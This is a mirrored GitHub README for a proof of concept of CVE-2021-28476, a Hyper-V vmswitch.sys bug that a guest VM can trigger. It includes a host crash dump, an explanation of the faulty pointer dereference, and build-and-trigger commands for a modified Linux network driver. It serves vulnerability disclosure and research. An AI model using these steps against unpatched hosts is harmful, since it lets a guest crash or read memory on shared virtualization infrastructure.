0vercl0k/CVE-2021-28476 0vercl0k/CVE-2021-28476

  • This repository has been archived on 27/Dec/2023
  • Stars
    star
    217
  • Rank 182,446 (Top 4 %)
  • Language
    C
  • License
    MIT License
  • Created over 3 years ago
  • Updated over 3 years ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
0vercl0k/CVE-2021-28476
github

0vercl0k

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

PoC for CVE-2021-28476 a guest-to-host "Hyper-V Remote Code Execution Vulnerability" in vmswitch.sys.

CVE-2021-28476: a guest-to-host "Microsoft Hyper-V Remote Code Execution Vulnerability" in vmswitch.sys.

This is a proof of concept for CVE-2021-28476 ("Hyper-V Remote Code Execution Vulnerability"), an arbitrary memory read in vmswitch.sys (network virtualization service provider) patched by Microsoft in May 2021.

rel04vsrel05

The vulnerability was found by @australeo, @ergot86, @peleghd and @OphirHarpaz. It is triggerable by a guest virtual machine sending a malicious RNDIS packet over VMBus (which is a channel-based communication mechanism used for inter-partition communication).

trigger

This is what the host system crash looks like in a debugger:

*** Fatal System Error: 0x0000007e
                       (0xFFFFFFFFC0000005,0xFFFFF80AD4A41A63,0xFFFFB70DD7EB7028,0xFFFFB70DD7EB6860)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff801`31412c50 cc              int     3

kd> .cxr 0xffffb70dd7eb6860
rax=fffff80ad4bc7214 rbx=fffff80ad4bf62a0 rcx=0000000000000000
rdx=00000000047a2807 rsi=ffffb70dd7eb7420 rdi=ffffa58caa318f00
rip=fffff80ad4a41a63 rsp=ffffb70dd7eb7260 rbp=ffffa58caa318fe0
 r8=0000000000000000  r9=000000000000013b r10=deadbeefbaadc0be
r11=ffffb70dd7eb7230 r12=fffff80ad4bc73d0 r13=00000000c0000001
r14=00000000000021f0 r15=fffff80ad4bc7360
iopl=0         nv up ei pl zr na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00050246
vmswitch!VmsIfrInfoParams_OID_SWITCH_NIC_REQUEST+0xfb:
fffff80a`d4a41a63 418b4a20        mov     ecx,dword ptr [r10+20h] ds:002b:deadbeef`baadc0de=????????

kd> kp
 # Child-SP          RetAddr               Call Site
00 ffffb70d`d7eb7260 fffff80a`d4a3ee41     vmswitch!VmsIfrInfoParams_OID_SWITCH_NIC_REQUEST+0xfb
01 ffffb70d`d7eb7300 fffff80a`d4a3fc76     vmswitch!VmsIfrInfoParamsNdisOidRequestBuffer+0x14d
02 ffffb70d`d7eb7380 fffff80a`d4a3c779     vmswitch!RndisDevHostHandleSetMessage+0x196
03 ffffb70d`d7eb7420 fffff801`3136f423     vmswitch!RndisDevHostControlMessageWorkerRoutine+0x199
04 ffffb70d`d7eb74c0 fffff801`3123a975     nt!IopProcessWorkItem+0x93
05 ffffb70d`d7eb7530 fffff801`3132ce85     nt!ExpWorkerThread+0x105
06 ffffb70d`d7eb75d0 fffff801`31412408     nt!PspSystemThreadStartup+0x55
07 ffffb70d`d7eb7620 00000000`00000000     nt!KiStartSystemThread+0x28

The bug itself happens in VmsIfrInfoParams_OID_SWITCH_NIC_REQUEST which is a function that can be called with attacker-controlled data (which it shouldn't) and dereference twice a pointer (boom->_win below) that a malicious guest virtual machine can provide.

boom

If this is interesting to you, @peleghd and @OphirHarpaz will be discussing this in details as well as the discovery process in a BlackHat USA 2021 presentation entitled hAFL1: Our Journey of Fuzzing Hyper-V and Discovering a 0-Day.

Running the PoC

The easiest way to run the PoC is to create a Linux virtual machine running the latest Ubuntu Focal.

Once this is done, clone the matching kernel sources:

$ uname -a
Linux tourdeforce 5.4.0-73-generic #82-Ubuntu SMP Wed Apr 14 17:39:42 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
$ git clone git://kernel.ubuntu.com/ubuntu/ubuntu-focal.git
$ cd ubuntu-focal
$ git checkout Ubuntu-5.4.0-73.82
$ git branch fbl_vswitch
$ git checkout fbl_vswitch

Replace ~/ubuntu-focal/drivers/net/hyperv/netvsc_drv.c by src/netvsc_drv.c, ~/ubuntu-focal/drivers/net/hyperv/rndis_filter.c by src/rndis_filter.c and ~/ubuntu-focal/drivers/net/hyperv/hyperv_net.h by src/hyperv_net.h (full diff available in cve-2021-28476.diff):

$ sudo apt-get install git build-essential kernel-package fakeroot libncurses5-dev libssl-dev ccache bison flex libelf-dev dwarves
$ cp /boot/config-5.4.0-73-generic .config
$ make oldconfig
$ make modules
$ make M=drivers/net/hyperv

Finally, trigger the issue by loading the module and change the ethernet address of the network interface (this action triggers the specific code-path we added in rndis_filter.c / netvsc_set_mac_addr):

$ sudo rmmod hv_netvsc && insmod drivers/net/hyperv/hv_netvsc.ko
$ sudo ifconfig eth0 hw ether 00:11:22:33:44

Authors

More Repositories

1

rp

rp++ is a fast C++ ROP gadget finder for PE/ELF/Mach-O x86/x64/ARM/ARM64 binaries.
C++
1,804
star
2

wtf

wtf is a distributed, code-coverage guided, customizable, cross-platform snapshot-based fuzzer designed for attacking user and / or kernel-mode targets running on Microsoft Windows and Linux user-mode (experimental!).
C++
1,472
star
3

CVE-2021-31166

Proof of concept for CVE-2021-31166, a remote HTTP.sys use-after-free triggered remotely.
Python
824
star
4

CVE-2019-11708

Full exploit chain (CVE-2019-11708 & CVE-2019-9810) against Firefox on Windows 64-bit.
JavaScript
617
star
5

stuffz

Basically a script thrift shop
C
589
star
6

windbg-scripts

A bunch of JavaScript extensions for WinDbg.
JavaScript
315
star
7

CVE-2022-21971

PoC for CVE-2022-21971 "Windows Runtime Remote Code Execution Vulnerability"
Rich Text Format
306
star
8

clairvoyance

Visualize the virtual address space of a Windows process on a Hilbert curve.
C++
294
star
9

z3-playground

A repository to store Z3-python scripts you can use as examples, reminders, whatever.
Python
273
star
10

CVE-2021-24086

Proof of concept for CVE-2021-24086, a NULL dereference in tcpip.sys triggered remotely.
Python
232
star
11

CVE-2019-9810

Exploit for CVE-2019-9810 Firefox on Windows 64-bit.
JavaScript
228
star
12

udmp-parser

A Cross-Platform C++ parser library for Windows user minidumps with Python 3 bindings.
C++
193
star
13

kdmp-parser

A Windows kernel dump C++ parser library with Python 3 bindings.
C++
193
star
14

blazefox

Blazefox exploits for Windows 10 RS5 64-bit.
C++
148
star
15

symbolizer

A fast execution trace symbolizer for Windows.
C++
130
star
16

zenith

Zenith exploits a memory corruption vulnerability in the NetUSB driver to get remote-code execution on the TP-Link Archer C7 V5 router for Pwn2Own Austin 2021.
Python
121
star
17

sic

Enumerate user mode shared memory mappings on Windows.
C
114
star
18

ollydbg2-python

Scripting OllyDBG2 using Python is now possible!
C++
110
star
19

snapshot

WinDbg extension written in Rust to dump the CPU / memory state of a running VM
Rust
110
star
20

rp-bf.rs

rp-bf: A library to bruteforce ROP gadgets by emulating a Windows user-mode crash-dump
Rust
110
star
21

fuzzing-ida75

Repository of the findings found by wtf when fuzzing IDA75.
86
star
22

paracosme

Paracosme is a zero-click remote memory corruption exploit that compromises ICONICS Genesis64 which was demonstrated successfully on stage during the Pwn2Own Miami 2022 competition.
Python
86
star
23

symbolizer-rs

A fast execution trace symbolizer for Windows that runs on all major platforms and doesn't depend on any Microsoft libraries.
Rust
84
star
24

CVE-2022-28281

PoC for CVE-2022-28281 a Mozilla Firefox Out of bounds write.
HTML
74
star
25

lockmem

This utility allows you to lock every available memory regions of an arbitrary process into its working set.
C++
66
star
26

pywinhv

Python bindings for the Microsoft Hypervisor Platform APIs.
Python
66
star
27

CVE-2022-21974

PoC for CVE-2022-21974 "Roaming Security Rights Management Services Remote Code Execution Vulnerability"
Rich Text Format
58
star
28

pwn2own2023-miami

Writeups, PoCs of the bugs I found while preparing for the Pwn2Own Miami 2023 contest targeting UaGateway from the OPC UA Server category.
C++
57
star
29

CVE-2021-32537

PoC for CVE-2021-32537: an out-of-bounds memory access that leads to pool corruption in the Windows kernel.
C++
57
star
30

j0llyDmpr

j0llydmper is a windows service that allows you to dump furtively and automaticaly some contents of USB disks just plugged in your computer. In order to dump potentialy interesting files, you can use a rule on the file name or/and on the file size.
C
40
star
31

udmp-parser-rs

A Rust crate for parsing Windows user minidumps.
Rust
40
star
32

inject

Yet another Windows DLL injector.
C++
38
star
33

kdmp-parser-rs

A KISS Rust crate to parse Windows kernel crash-dumps created by Windows & its debugger.
Rust
32
star
34

KEPaboo

Neutralize KEPServerEX anti-debugging techniques
C++
31
star
35

longue-vue

Longue vue is an exploit chain that can compromise over the internet NETGEAR DGND3700v2 devices.
JavaScript
25
star
36

TV-Show-Downloader

Maybe you're a guy a bit like me -- who watch a lot of series -- so I guess you already know that downloading the latest episodes of all your favorites TV Shows is absolutely PAINFUL. I mean it, really. Thus, TVShow Downloader is a set of basic scripts (crontab + python script + bash script) designed to simplify my whole existence on this earth: I haven't to think about downloading my serie anymore \o/.
Python
21
star
37

teesee-calc

Visualize and compare total compensation (TC) packages over time.
HTML
11
star
38

dbgeng-rs

Rust binding for the dbgeng COM interfaces.
Rust
11
star
39

articles

Mirror of the different PDF articles I wrote
10
star
40

0vercl0k

5
star
41

gflags-rs

Utility that lets you interact with Microsoft Windows Global Flags and particularly PageHeap, made to learn Rust
Rust
4
star
42

addr-symbolizer-rs

A KISS Rust crate to symbolize function addresses using Windows PDB files
Rust
4
star
43

rp2s

3
star
44

result

Simple, tiny and readable implementation of a Rust like std::result type for C++.
1
star